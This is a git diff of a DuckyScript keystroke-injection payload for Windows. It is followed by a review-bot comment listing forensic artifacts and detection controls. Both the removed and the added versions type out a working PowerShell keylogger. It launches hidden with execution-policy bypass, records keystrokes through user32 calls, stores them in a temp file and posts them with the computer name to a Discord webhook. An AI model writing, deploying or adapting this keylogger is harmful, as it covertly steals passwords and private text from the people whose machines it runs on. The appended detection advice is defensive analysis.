diff --git a/OSINT/Keylogger to Discord.txt b/OSINT/Keylogger to Discord.txt
index a33a1e9..c10d7f1 100644
--- a/OSINT/Keylogger to Discord.txt
+++ b/OSINT/Keylogger to Discord.txt
@@ -2,481 +2,21 @@ REM Title: Keylogger to Discord REM Author: @beigeworm REM Description: Uses Powershell to gather keystroke info and send it via Discord. REM Target: Windows 10 +REM LEARN MORE HERE - https://github.com/beigeworm/Powershell-Tools-and-Toys REM *SETUP* -REM replace WEBHOOK_HERE with your discord webhook. -REM set $runtime=1 to desired interval beetween emails (in minutes). Default is 1 minute. +REM replace WEBHOOK_GOES_HERE with your discord webhook. + REM some setup for dukie script DEFAULT_DELAY 100 -REM Open Notepad for script building. -DELAY 1000 -GUI r -DELAY 500 -STRING notepad -ENTER -DELAY 2500 -STRING Do{$whuri = "WEBHOOK_HERE";$RunTime = 1;$TimesRun = 1;$getT = Get-Date -ENTER -STRING $end = $strt.addminutes($RunTime);function Start-Key($Path="$env:temp\log.txt"){$sigs = @' -ENTER -STRING [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] public static extern short GetAsyncKeyState(int virtualKeyCode); -ENTER -STRING [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int GetKeyboardState(byte[] keystate); -ENTER -STRING [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int MapVirtualKey(uint uCode, int uMapType); -ENTER -STRING [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags); -ENTER -STRING '@ -ENTER -ENTER -STRING $API = Add-Type -MemberDefinition $sigs -Name 'Win32' -Namespace API -PassThru;$null = New-Item -Path $Path -ItemType File -Force;try{$rnnr = 0;while ($TimesRun -ge $rnnr){ -ENTER -STRING while ($end -ge $getT){Start-Sleep -Milliseconds 30;for($ascii = 9; $ascii -le 254; $ascii++){$state = $API::GetAsyncKeyState($ascii);if($state -eq -32767){$null = [console]::CapsLock -ENTER -STRING $virtualKey = $API::MapVirtualKey($ascii, 3);$kbstate = New-Object Byte[] 256;$checkkbstate = $API::GetKeyboardState($kbstate);$mychar = New-Object 
-TypeName System.Text.StringBuilder -ENTER -STRING $success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0);if($success){[System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode)}}} -ENTER -STRING $getT = Get-Date};$msg = Get-Content -Path $Path -Raw; $escmsg = $msg -replace '[&<>]', {$args[0].Value.Replace('&', '&').Replace('<', '<').Replace('>', '>')} -ENTER -STRING $json = @{"username" = "$env:COMPUTERNAME" -ENTER -STRING "content" = $escmsg} | ConvertTo-Json -ENTER -STRING Start-Sleep 1; Invoke-RestMethod -Uri $whuri -Method Post -ContentType "application/json" -Body $json; Start-Sleep 1; $whuri = "." -ENTER -STRING Remove-Item -Path $Path -force}}finally{}}Start-Key}While ($a -le 5) -ENTER -DELAY 1000 - -REM because typing speed can't be adjusted. (Can be avoided by moving the mouse while flipper types) -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE 
-ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE 
-ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE - - -DELAY 10000 -REM save in temp directory. -DELAY 1000 -CTRL-SHIFT s -DELAY 1500 -STRING %temp% -ENTER -STRING txtlog.ps1 -DELAY 500 -TAB -DOWN -DOWN -ENTER -ENTER -DELAY 1000 -ALT F4 - REM Open Powershell and start logs. DELAY 1000 GUI r DELAY 500 -STRING powershell -NoP -NonI -W Hidden -Exec Bypass -C cd $env:temp;sleep 1; ./txtlog.ps1;sleep 5;exit +STRING powershell -NoP -NonI -Exec Bypass -W hidden +ENTER +DELAY 5000 +STRING $dc = "WEBHOOK_GOES_HERE!";$API = '[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] public static extern short GetAsyncKeyState(int virtualKeyCode); [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int GetKeyboardState(byte[] keystate); [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int MapVirtualKey(uint uCode, int uMapType); [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);';$lpth = "$env:temp/t.txt";$API = Add-Type -MemberDefinition $API -Name 'Win32' -Namespace API -PassThru;$no = New-Item -Path $lpth -ItemType File -Force;$fcont = Get-Content -Path $lpth -Raw;$lkt = [System.Diagnostics.Stopwatch]::StartNew();$kth = [TimeSpan]::FromSeconds(10);While ($true){$kpr = $false;try{while ($lkt.Elapsed -lt $kth){Start-Sleep -Milliseconds 30;for ($asc = 9; $asc -le 254; $asc++){$keyst = $API::GetAsyncKeyState($asc);if ($keyst -eq -32767) {$kpr = $true;$lkt.Restart();$null = [console]::CapsLock;$vtkey = $API::MapVirtualKey($asc, 3);$kbst = New-Object Byte[] 256;$checkkbst = $API::GetKeyboardState($kbst);$logchar = New-Object -TypeName System.Text.StringBuilder;if ($API::ToUnicode($asc, $vtkey, $kbst, $logchar, $logchar.Capacity, 0)){[System.IO.File]::AppendAllText($lpth, $logchar, [System.Text.Encoding]::Unicode) }}}}}finally{If ($kpr) {$fcont = 
Get-Content -Path $lpth -Raw;$escmsgsys = $fcont -replace '[&<>]', {$args[0].Value.Replace('&', '&').Replace('<', '<').Replace('>', '>')};$jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = $escmsgsys} | ConvertTo-Json;Invoke-RestMethod -Uri $dc -Method Post -ContentType "application/json" -Body $jsonsys;Remove-Item -Path $lpth -Force;$kpr = $false}}$lkt.Restart();Start-Sleep -Milliseconds 10} ENTER -
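Review bot: The header REM block still documents setup only and does not record what the rewritten payload leaves on the host, which this hunk changes: the staged `txtlog.ps1` in `%temp%` is gone, the script is typed directly into a `powershell -NoP -NonI -Exec Bypass -W hidden` session, and captured text is buffered in `$env:temp/t.txt`. For anyone validating detections against this payload, a comment under `REM *SETUP*` should list those observables, for example `REM Artifacts: hidden powershell.exe with -Exec Bypass, Add-Type of user32 GetAsyncKeyState/ToUnicode imports, $env:temp/t.txt, POST to the Discord webhook URL`. In the `finally` block `Remove-Item` comes after `Invoke-RestMethod`, so if the POST throws, the capture file presumably stays on disk in cleartext, which matters for forensic triage. PowerShell script-block logging and egress filtering of Discord webhook endpoints are the controls most likely to surface this version, since no script file is written to disk any more.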